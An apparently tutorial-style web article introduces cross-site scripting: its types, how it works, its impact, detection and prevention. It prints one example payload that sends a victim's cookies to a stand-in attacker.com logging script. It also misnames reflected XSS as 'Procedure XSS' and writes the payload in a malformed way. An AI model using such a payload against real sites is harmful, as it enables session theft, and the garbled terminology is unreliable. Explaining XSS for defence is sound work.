Introduction to Cross Site Scripting
Cross-Site Scripting is an attack on the web security of the user, the main motive of the attacker is to steal the data of the user by running a malicious script in the browser that is injected in the website content which is used by the user, as a result of this attack, the attacker gains full control of the victims browser which he can use to browse and send the worm to the user computer, this attack is classified into two categories i.e. Stored XSS attack and Procedure XSS attack.
Different types of Cross Site Scripting (XSS)
Although there is no particular classification of Cross Site Scripting, some experts have classified it into two types which are discussed below in detail:
Stored XSS attacks
- Stored XSS are those in which the malicious script injected by the attacker gets stored in the database and runs on the browser of the user when he tries to access the database in some form. These are also known as Persistent or stored XSS. This is one of the most devastating attacks and happens especially when the website/ web page allows commenting or allows the embedding of HTML content.
- The attacker adds the javascript in the comment which gets stored in the database and when the user accesses the affected page retrieving the data from the database that malicious script runs in its browser and that attacker gets unauthorized access to the user’s private data.
- For example, in an e-commerce website like Olx which has an unsanitized message box for product description, an attacker being the product seller adds the malicious javascript in it and it will get stored in the database of the website.
- When the buyer will open the product description to view the details of the product will now become the victim as the script executes in its web browser and all the details of the user which browser allows will get hijacked.
Procedure XSS attacks
- This is one of the most common ways by which an attacker can cause an XSS attack on the user. Basically, in Procedure XSS attacks, the attacker targets the victim by sending an email, a malicious link or attaching a string in the search result which points to a trusted website but contains the malicious javascript code.
- If a victim clicks on that URL, it initiates the HTTP request and it sends a request to the vulnerable web application. The request then comes back to the victim with a response of embedded javascript code which the web browser executes considering it coming from a trusted website result in the hijacking of its browser’s confidential data.
- For Example, in an e-commerce website, there is a search box in which a user can search the items and the string written in the search box is visible in the URL of the website when the search request is sent to the server.
- The attacker creates a link in which the malicious script is concatenated in the URL and sent it to the victim via email. When the victim opens that link then the request is sent to the malicious website of the attacker and all the browser data of the victim is hijacked and sent to the system of the attacker.
How does it works?
- In Cross Site Scripting (XSS) vulnerability, the main motive of attacker is to steal the data of the user by running the malicious script in its browser which is injected in the website content which the user is using through different means.
- For Example, when a user searches for some text in a website, then the request is sent to the server in the form:
https://www.abcwebsite.com/search?q=text1
In the search result, the website returns the result along with what the user searched for like:
You searched for: text1 |
If the search functionality is vulnerable to XSS then the attacker can add the malicious script in the URL :
https://www.abcwebsite.com/search=<script> document location=https://attacker.com/log.php?c=’ +encodeURIComponent(document.cookie)</script> |
- When the victim clicks on this link, it redirects to the malicious website, i.e. https://attacker.com and all the browser data is directly sent to the attacker’s computer resulting in attacker stealing all the session token/cookies.
- In this way, an attacker injects its malicious script in the URL, Attacker can also store that script in the server which comes under Stored XSS.
Impact of Cross-Site Scripting Vulnerabilities
Impact of Cross Site Scripting varies a lot. After exploiting the XSS vulnerability, an attacker gains full control of the victim’s browser and can perform different actions that vary from small ones like viewing the browser history to disastrous ones like inserting worms in the computer.
Some of the actions which the attacker can perform by exploiting the XSS vulnerability are as follows:-
4.6 (3,144 ratings)
View Course
- Leaking sensitive information like username and password.
- Inserting worms on the computer.
- Redirecting the user to some dangerous website and forcing to perform some actions
- Access the browsing history of the victim.
- Installation of Trojan horse program.
- Force the user to perform and modify the values in the application by gaining access over
Finding Cross-Site Scripting Vulnerabilities
- XSS vulnerabilities occur for two reasons either the input from the user is not validated before sending it to the server or the output received to the browser is not HTML encoded. Keeping in mind the disastrous impact of XSS vulnerability and protecting the privacy of users, it is very important to find whether the web application is vulnerable to XSS or not.
- Although XSS is difficult to identify and remove, the best way to check is to perform the security review of the code and check for all the places where the input from the HTTP request can make its way to display as Output in an application. Using the automatic vulnerability scanner tools which include specialized XSS scanner module to scan the whole web application can also help in scanning and finding the vulnerabilities in an application.
How to Prevent XSS?
- XSS is a code injection vulnerability, so it is very important to encoding the data which is sent to the server and the data which comes from the server to the browser of a user.
- Data Validation is also very important so that the browser interprets the code without any malicious commands. Different prevention methods were introduced keeping the data Validation and Encoding as a priority for a website to be vulnerable to XSS.
Some points need to be focussed to prevent XSS:
- HTTP Trace support on all the web servers should be turned off as the attacker can steal the cookie and private browser data through an HTTP trace call from the server even if document.cookie is disabled in the victim’s browser.
- Developers should sanitize the input and should never output the data directly received from the user without validating it.
- Links should generally be disallowed if they don’t begin with the whitelisted protocols such as HTTP://, https:// thus preventing the use of URI schemes such as javascript://
Conclusion
XSS attacks are dangerous and can harm the privacy of the user and steal the data unless the normal user browses the application carefully. So developers while developing the application should follow the strict security rules especially for both data and server so that the application is least vulnerable to XSS and more user’s can rely on it.
Recommended Articles
This has been a guide to What is Cross Site Scripting?. Here we discuss the different types of cross site, working, impact, and prevention of XSS respectively. You can also go through our other suggested articles to learn more –